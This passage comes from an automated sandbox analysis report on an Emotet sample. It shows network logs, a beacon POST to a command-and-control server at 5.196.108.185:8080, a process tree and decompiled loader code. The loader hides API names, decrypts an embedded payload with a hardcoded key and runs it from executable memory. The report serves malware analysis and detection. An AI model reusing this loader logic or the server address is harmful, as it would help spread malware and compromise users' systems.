Mar 12, 2021 16:27:35.609936953 CET	53	55016	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:54.762638092 CET	64345	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:54.814448118 CET	53	64345	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:55.492172956 CET	57128	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:55.552234888 CET	53	57128	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:55.966312885 CET	54791	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:56.028846979 CET	53	54791	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:56.474679947 CET	50463	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:56.531752110 CET	53	50463	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:56.819484949 CET	50394	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:56.887015104 CET	53	50394	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:57.060777903 CET	58530	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:57.117913961 CET	53	58530	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:57.744611979 CET	53813	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:57.794827938 CET	53	53813	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:58.390858889 CET	63732	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:58.448246956 CET	53	63732	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:59.164827108 CET	57344	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:59.226840019 CET	53	57344	8.8.8.8	192.168.2.5
Mar 12, 2021 16:28:00.153496981 CET	54450	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:28:00.203022003 CET	53	54450	8.8.8.8	192.168.2.5
Mar 12, 2021 16:28:00.828726053 CET	59261	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:28:00.888631105 CET	53	59261	8.8.8.8	192.168.2.5

HTTP Request Dependency Graph

5.196.108.185

5.196.108.185:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49724	5.196.108.185	8080	C:\Windows\SysWOW64\WsmSvc\iasrecst.exe

Timestamp	kBytes transferred	Direction	Data
Mar 12, 2021 16:27:27.281419992 CET	1561	OUT	POST /wGf14n07/vS3mZ/aWoW/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 5.196.108.185/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=-----------jFClBgacZrw User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 5.196.108.185:8080 Content-Length: 4596 Cache-Control: no-cache
Mar 12, 2021 16:27:27.331406116 CET	1566	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Mar 2021 15:27:27 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: 2ojdmC51As.exe PID: 5356 Parent PID: 5616

General

Start time:	16:26:40
Start date:	12/03/2021
Path:	C:\Users\user\Desktop\2ojdmC51As.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\2ojdmC51As.exe'
Imagebase:	0x400000
File size:	376832 bytes
MD5 hash:	5804D97670DCDFAB88BA830682355DAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.231317711.0000000002194000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: iasrecst.exe PID: 2964 Parent PID: 5356

General

Start time:	16:26:41
Start date:	12/03/2021
Path:	C:\Windows\SysWOW64\WsmSvc\iasrecst.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WsmSvc\iasrecst.exe
Imagebase:	0x400000
File size:	376832 bytes
MD5 hash:	5804D97670DCDFAB88BA830682355DAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.494960467.0000000000710000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.496587282.0000000002284000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 396 Parent PID: 556

General

Start time:	16:26:54
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5292 Parent PID: 556

General

Start time:	16:27:04
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6048 Parent PID: 556

General

Start time:	16:27:05
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5116 Parent PID: 556

General

Start time:	16:27:05
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 5456 Parent PID: 556

General

Start time:	16:27:06
Start date:	12/03/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff6e2520000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5548 Parent PID: 556

General

Start time:	16:27:06
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6492 Parent PID: 556

General

Start time:	16:27:09
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 7096 Parent PID: 556

General

Start time:	16:27:30
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6208 Parent PID: 556

General

Start time:	16:27:45
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6596 Parent PID: 556

General

Start time:	16:27:53
Start date:	12/03/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 4660 Parent PID: 5548

General

Start time:	16:28:07
Start date:	12/03/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff685440000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4672 Parent PID: 4660

General

Start time:	16:28:08
Start date:	12/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 2ojdmC51As.exe PID: 5356 Parent PID: 5616 2ojdmC51As.exeCOMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	45.4%
Signature Coverage:	25.8%
Total number of Nodes:	527
Total number of Limit Nodes:	59

Executed Functions

Function 004013A4, Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 288
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E004013A4(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				char _v36;
				char _v40;
				intOrPtr _v44;
				CHAR* _v52;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				char _v88;
				intOrPtr _v128;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				void* _v156;
				long _v160;
				char _v176;
				void* _v180;
				intOrPtr _v184;
				char _v200;
				char _v216;
				intOrPtr _v228;
				char _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				char _v252;
				void* _v256;
				struct HINSTANCE__* _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v316;
				void* _v320;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				void* _t188;
				void* _t189;
				intOrPtr _t244;

				_push(0xffffffff);
				_push(E00429B1F);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t244;
				_v448 = __ecx;
				_v256 = 0;
				_v256 = GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateDirectoryA");
				if(CreateDirectoryA("C:\\Windows\\Microsoft.NET", 0) == 0) {
					_v152 = 0x1e55;
					_v240 = 0x1155;
					_v44 = 0x409;
					_v72 = 0;
					_v160 = 0;
					_v252 = 0xa;
					_v248 = _v152;
					_v244 = _v44;
					_v260 = 0;
					_v176 = _v264;
					E00401AE0( &_v176, 0);
					E00401B90( &_v176, "LdrFin", E00405A40("LdrFin"));
					_v8 = 0;
					_v216 = _v268;
					E00401AE0( &_v216, 0);
					E00401B90( &_v216, "dReso", E00405A40("dReso"));
					_v8 = 1;
					_v36 = _v272;
					E00401AE0( &_v36, 0);
					E00401B90( &_v36, "urce_U", E00405A40("urce_U"));
					_v8 = 2;
					_v452 = E00402030( &_v288,  &_v176,  &_v216);
					_v456 = _v452;
					_v8 = 3;
					E00402030( &_v232, _v456,  &_v36);
					_v8 = 5;
					E00401AE0( &_v288, 1);
					_v200 = _v292;
					E00401AE0( &_v200, 0);
					E00401B90( &_v200, "Ldr", E00405A40("Ldr"));
					_v8 = 6;
					_v144 = _v296;
					E00401AE0( &_v144, 0);
					E00401B90( &_v144, "Acces", E00405A40("Acces"));
					_v8 = 7;
					_v88 = _v300;
					E00401AE0( &_v88, 0);
					E00401B90( &_v88, "sResource", E00405A40("sResource"));
					_v8 = 8;
					_v460 = E00402030( &_v316,  &_v200,  &_v144);
					_v464 = _v460;
					_v8 = 9;
					E00402030( &_v68, _v464,  &_v88);
					_v8 = 0xb;
					E00401AE0( &_v316, 1);
					_v52 = "ntdll.dll";
					if(_v228 != 0) {
						_v468 = _v228;
					} else {
						_v468 = 0x42b704;
					}
					_v184 = _v468;
					if(_v64 != 0) {
						_v472 = _v64;
					} else {
						_v472 = 0x42b704;
					}
					_v128 = _v472;
					_v260 = LoadLibraryA(_v52);
					 *0x437cbc = GetProcAddress(_v260, "LdrFindResource_U");
					 *0x437cb4 = GetProcAddress(_v260, "LdrAccessResource");
					_v236 =  *0x437cbc(0x400000,  &_v252, 3,  &_v40);
					if(_v236 >= 0) {
						_v236 =  *0x437cb4(0x400000, _v40,  &_v72,  &_v160);
					}
					_v180 = 0;
					if(CreateDirectoryA("C:\\ProgramData\\", 0) == 0) {
						_t189 = VirtualAlloc(0, _v160, 0x1000, 0x40); // executed
						_v180 = _t189;
					}
					E00405700(_v180, _v72, _v160);
					E0040107E("@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@", 0x2f,  &_v20);
					E00401163(_v180, _v160,  &_v20);
					_v156 = _v180;
					_v148 = _v156();
					_v320 = 0;
					_v8 = 8;
					E00401AE0( &_v68, 1);
					_v8 = 7;
					E00401AE0( &_v88, 1);
					_v8 = 6;
					E00401AE0( &_v144, 1);
					_v8 = 5;
					E00401AE0( &_v200, 1);
					_v8 = 2;
					E00401AE0( &_v232, 1);
					_v8 = 1;
					E00401AE0( &_v36, 1);
					_v8 = 0;
					E00401AE0( &_v216, 1);
					_v8 = 0xffffffff;
					E00401AE0( &_v176, 1);
					_t188 = _v320;
				} else {
					_t188 = 0;
				}
				 *[fs:0x0] = _v16;
				return _t188;
			}

0x004013a7
0x004013a9
0x004013b4
0x004013b5
0x004013c2
0x004013c8
0x004013e9
0x004013fe
0x00401407
0x00401411
0x0040141b
0x00401422
0x00401429
0x00401433
0x00401443
0x0040144c
0x00401452
0x00401462
0x00401470
0x0040148e
0x00401493
0x004014a0
0x004014ae
0x004014cc
0x004014d1
0x004014db
0x004014e3
0x004014fe
0x00401503
0x00401528
0x00401534
0x0040153a
0x0040154c
0x00401554
0x00401560
0x0040156b
0x00401579
0x00401597
0x0040159c
0x004015a6
0x004015b4
0x004015d2
0x004015d7
0x004015e1
0x004015e9
0x00401604
0x00401609
0x0040162e
0x0040163a
0x00401640
0x0040164f
0x00401657
0x00401663
0x00401668
0x00401676
0x0040168a
0x00401678
0x00401678
0x00401678
0x00401696
0x004016a0
0x004016b1
0x004016a2
0x004016a2
0x004016a2
0x004016bd
0x004016ca
0x004016e2
0x004016f9
0x00401716
0x00401723
0x0040173f
0x0040173f
0x00401745
0x0040175e
0x00401770
0x00401776
0x00401776
0x0040178e
0x004017a1
0x004017bb
0x004017c9
0x004017d5
0x004017db
0x004017e5
0x004017ee
0x004017f3
0x004017fc
0x00401801
0x0040180d
0x00401812
0x0040181e
0x00401823
0x0040182f
0x00401834
0x0040183d
0x00401842
0x0040184e
0x00401853
0x00401862
0x00401867
0x00401400
0x00401400
0x00401400
0x00401870
0x0040187a

APIs

LoadLibraryA.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 004013DC
GetProcAddress.KERNEL32(00000000), ref: 004013E3
CreateDirectoryA.KERNELBASE(C:\Windows\Microsoft.NET,00000000), ref: 004013F6

Strings

urce_U, xrefs: 004014E8, 004014F6
dReso, xrefs: 004014B3, 004014C1
LdrFindResource_U, xrefs: 004016D0
C:\ProgramData\, xrefs: 00401751
sResource, xrefs: 004015EE, 004015FC
LdrFin, xrefs: 00401475, 00401483
LdrAccessResource, xrefs: 004016E7
kernel32.dll, xrefs: 004013D7
CreateDirectoryA, xrefs: 004013D2
C:\Windows\Microsoft.NET, xrefs: 004013F1
Ldr, xrefs: 0040157E, 0040158C
Acces, xrefs: 004015B9, 004015C7
@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@, xrefs: 0040179C

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressCreateDirectoryLibraryLoadProc
String ID: @P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@$Acces$C:\ProgramData\$C:\Windows\Microsoft.NET$CreateDirectoryA$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$dReso$kernel32.dll$sResource$urce_U
API String ID: 3952968459-2121162702
Opcode ID: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
Instruction ID: 061a306ec623a826179d85857fa582b4a8c01ab5e49a60f3ccf10d5f337b011f
Opcode Fuzzy Hash: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
Instruction Fuzzy Hash: BDD14070E41258ABDB20DB90DD56BEEB7B4AB18304F1081EAE509772D1DBB81F84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 021E38F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E021E38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				short _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				signed int _t24;
				intOrPtr* _t28;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				signed int _t49;
				int _t55;
				void* _t58;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;

				_t93 = __ecx;
				_t97 = __edx;
				_v1640 = __ecx;
				_t22 = 0x1b0f738d;
				_t58 = _v1640;
				goto L1;
				do {
					while(1) {
						L1:
						_t100 = _t22 - 0xd5d5438;
						if(_t100 <= 0) {
							break;
						}
						if(_t22 == 0x1b0f738d) {
							_t22 = 0x1c39f1c;
							continue;
						} else {
							if(_t22 != 0x3aa0d798) {
								goto L6;
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t24 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L30:
										if(_t97 == 0) {
											goto L29;
										} else {
											_t96 = E021E34C0(0x21ed260);
											_t28 =  *0x21edc60;
											if(_t28 == 0) {
												_t28 = E021E3E80(_t58, E021E3F20(0xe66945e6), 0xcca28b0d, _t97);
												 *0x21edc60 = _t28;
											}
											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
											E021E38F0( &_v524, _t97, _a4, _a8);
											_t98 = _t98 + 0x1c;
											E021E3460(_t96);
											_t22 = 0x60b76e4;
										}
									} else {
										_t33 = _v1590;
										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
											L29:
											_t22 = 0x60b76e4;
										} else {
											goto L30;
										}
									}
								}
								continue;
							}
						}
						L40:
					}
					if(_t100 == 0) {
						if( *0x21ee004 == 0) {
							 *0x21ee004 = E021E3E80(_t58, E021E3F20(0xbb398380), 0xf53ce71f, _t97);
						}
						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
						_t58 = _t35;
						if(_t58 == 0xffffffff) {
							return _t35;
						} else {
							_t22 = 0x3aa0d798;
							goto L1;
						}
					} else {
						if(_t22 == 0x1c39f1c) {
							_t95 = E021E34C0(0x21ed240);
							_t39 =  *0x21edc60;
							if(_t39 == 0) {
								_t39 = E021E3E80(_t58, E021E3F20(0xe66945e6), 0xcca28b0d, _t97);
								 *0x21edc60 = _t39;
							}
							 *_t39( &_v1044, 0x104, _t95, _t93);
							_t41 =  *0x21edea8;
							_t98 = _t98 + 0x10;
							if(_t41 == 0) {
								_t41 = E021E3E80(_t58, E021E3F20(0xbb398380), 0x97f883e, _t97);
								 *0x21edea8 = _t41;
							}
							_t94 =  *_t41();
							_t43 =  *0x21ee1a0;
							if(_t43 == 0) {
								_t43 = E021E3E80(_t58, E021E3F20(0xbb398380), 0x26c3f343, _t97);
								 *0x21ee1a0 = _t43;
							}
							 *_t43(_t94, 0, _t95);
							_t93 = _v1652;
							_t22 = 0xd5d5438;
							goto L1;
						} else {
							if(_t22 == 0x60b76e4) {
								if( *0x21edfd4 == 0) {
									 *0x21edfd4 = E021E3E80(_t58, E021E3F20(0xbb398380), 0xd3e90d14, _t97);
								}
								_t49 = FindNextFileW(_t58,  &_v1636); // executed
								asm("sbb eax, eax");
								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
								goto L1;
							} else {
								if(_t22 == 0x651b5f5) {
									if( *0x21ee064 == 0) {
										 *0x21ee064 = E021E3E80(_t58, E021E3F20(0xbb398380), 0xa4a77084, _t97);
									}
									_t55 = FindClose(_t58); // executed
									return _t55;
								}
								goto L6;
							}
						}
					}
					goto L40;
					L6:
				} while (_t22 != 0x36605fc2);
				return _t22;
				goto L40;
			}

0x021e38fa
0x021e38fc
0x021e38fe
0x021e3902
0x021e3907
0x021e390b
0x021e3910
0x021e3910
0x021e3910
0x021e3910
0x021e3915
0x00000000
0x00000000
0x021e3a79
0x021e3b62
0x00000000
0x021e3a7f
0x021e3a84
0x00000000
0x021e3a8a
0x021e3a8f
0x021e3b48
0x021e3b51
0x021e3b58
0x021e3a95
0x021e3a9b
0x021e3abf
0x021e3ac1
0x00000000
0x021e3ac3
0x021e3acd
0x021e3acf
0x021e3ad6
0x021e3ae9
0x021e3aee
0x021e3aee
0x021e3b07
0x021e3b23
0x021e3b28
0x021e3b2d
0x021e3b32
0x021e3b32
0x021e3a9d
0x021e3a9d
0x021e3aa5
0x021e3ab5
0x021e3ab5
0x00000000
0x00000000
0x00000000
0x021e3aa5
0x021e3a9b
0x00000000
0x021e3a8f
0x021e3a84
0x00000000
0x021e3a79
0x021e391b
0x021e3a33
0x021e3a4b
0x021e3a4b
0x021e3a5d
0x021e3a5f
0x021e3a64
0x021e3b9d
0x021e3a6a
0x021e3a6a
0x00000000
0x021e3a6a
0x021e3921
0x021e3926
0x021e3992
0x021e3994
0x021e399b
0x021e39ae
0x021e39b3
0x021e39b3
0x021e39c7
0x021e39c9
0x021e39ce
0x021e39d3
0x021e39e6
0x021e39eb
0x021e39eb
0x021e39f2
0x021e39f4
0x021e39fb
0x021e3a0e
0x021e3a13
0x021e3a13
0x021e3a1c
0x021e3a1e
0x021e3a22
0x00000000
0x021e3928
0x021e392d
0x021e3953
0x021e396b
0x021e396b
0x021e3976
0x021e397a
0x021e3981
0x00000000
0x021e392f
0x021e3934
0x021e3b73
0x021e3b8b
0x021e3b8b
0x021e3b91
0x00000000
0x021e3b91
0x00000000
0x021e3934
0x021e392d
0x021e3926
0x00000000
0x021e393a
0x021e393a
0x021e394b
0x00000000

APIs

FindNextFileW.KERNELBASE(?,?,00000000,021E998D,16BF64F2,00000001), ref: 021E3976
FindFirstFileW.KERNELBASE(?,?,00000000,021E998D,16BF64F2,00000001), ref: 021E3A5D
FindClose.KERNELBASE(?,00000000,021E998D,16BF64F2,00000001), ref: 021E3B91

Strings

Ei, xrefs: 021E399D
Ei, xrefs: 021E3AD8
8T], xrefs: 021E3910
., xrefs: 021E3A95
8T], xrefs: 021E3A22

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$8T]$8T]$Ei$Ei
API String ID: 3541575487-3972632629
Opcode ID: bbcbf0c1e1b444e7bcc24bf6de6306a89232d200df8180b8d6ea5dc5382159ee
Instruction ID: 30fc750b70782484c51499fa04e6d03f1797c16a4a0c26b3a38046ba30698317
